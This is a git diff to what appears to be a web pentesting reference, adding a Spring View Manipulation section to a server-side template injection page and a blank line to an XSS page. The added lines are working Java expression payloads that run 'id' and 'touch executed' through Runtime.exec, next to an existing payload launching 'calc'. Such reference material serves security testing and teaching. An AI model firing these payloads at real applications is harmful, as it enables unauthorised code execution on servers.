diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md
index 85bee64a..8713075c 100644
--- a/pentesting-web/ssti-server-side-template-injection.md
+++ b/pentesting-web/ssti-server-side-template-injection.md
@@ -151,6 +151,13 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
+### Spring View Manipulation \(Java\)
+
+* `__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x`
+* `__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x`
+
+[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
+
### Smarty \(PHP\)
#### More information
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 051e9a5c..cbbac5e4 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -522,6 +522,7 @@ A XSS occurs.
+
```
### Port Scanner \(fetch\)